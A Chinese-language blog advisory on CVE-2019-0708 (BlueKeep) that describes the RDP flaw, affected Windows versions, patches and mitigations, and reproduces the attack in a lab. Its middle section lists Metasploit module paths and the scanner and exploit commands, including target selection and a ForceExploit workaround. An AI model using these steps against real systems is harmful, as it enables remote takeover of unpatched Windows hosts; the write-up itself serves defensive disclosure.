前言

2019年9月7日凌晨,metasploit官方发布CVE-2019-0708漏洞利用代码,该EXP可以通过RDP协议进行远程代码执行攻击.官方描述此漏洞相关危害可参考2017年WannaCry事件,强烈建议用户及时安装补丁以避免受到损失.

一、漏洞始末

1.1、漏洞原理

CVE-2019-0708(远程代码执行漏洞),当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时,即可以触发该漏洞.此漏洞属于预身份验证,无需用户交互,成功利用此漏洞的攻击者可以安装应用程序,查看、更改或删除数据或创建具有完全用户权限的新账户.

恶意攻击者还很有可能利用该漏洞编写定制的恶意软件,利用此漏洞的恶意软件传播影响都可能与2017年WannaCry恶意软件遍布全球的事件类似,由于EXP的公开发布,需要广大用户更加警惕利用该漏洞的恶意软件的出现,提前做好预防措施.

1.2、漏洞时间

2019-5-14 Microsoft发布安全更新公告并披露漏洞.
2019-9-7 EXP发布并复现验证,证实该EXP可导致服务器远程代码执行,特再次发布预警,提供解决方案给广大企业用户.

1.3、影响范围

目前受影响的Windows版本:
Microsoft Windows XP
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2003
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for 32-bit Systems SP1

1.4、漏洞类型

远程代码执行

二、漏洞验证

2.1、环境准备

Metasploit
EXP对应脚本
Windows 7 x64 旗舰版6.1.7601 Service Pack 1 Build 7601

2.2、实操

0x1、Metasploit模块重载

该EXP被发布者在Metasploit的官方Github的Pull Request中,但尚未加载进Metasploit的官方框架中. 所以下载EXP对应脚本并进行替换!!!!!直接替换!!!

msf对应位置:
rdp.rb ----> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb ----> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb ----> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb ----> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
重载模块
msf5>reload_all

0x2、漏洞检测

msf5>use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5>set RHOSTS 172.16.144.142
msf5>run

0x3、漏洞利用

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 172.16.144.142
set target 3(target根据自己系统版本设定)
run

0x04、可能存在问题

* set target 1 - bluescreen(可能出现蓝屏重启)
* set target 3 - success
如果出现下图:

尝试设置: set ForceExploit true

四、漏洞加固

4.1、及时进行补丁更新

Microsoft在2019年5月14日修复了该漏洞
补丁下载地址: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
以及为已不受微软更新支持的系统(Windows Server 2003和Windows XP)提供的安全更新
补丁下载地址: https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

4.2、缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案):

- 若用户不需要用到远程桌面服务,建议禁用该服务.
- 开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2 以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新.

五、参考

https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
https://mp.weixin.qq.com/s/Mf5TuATyyU7-W2VDHCRKnA

© Copyright 2019  

Powered by  si1ent  

皖ICP备19004273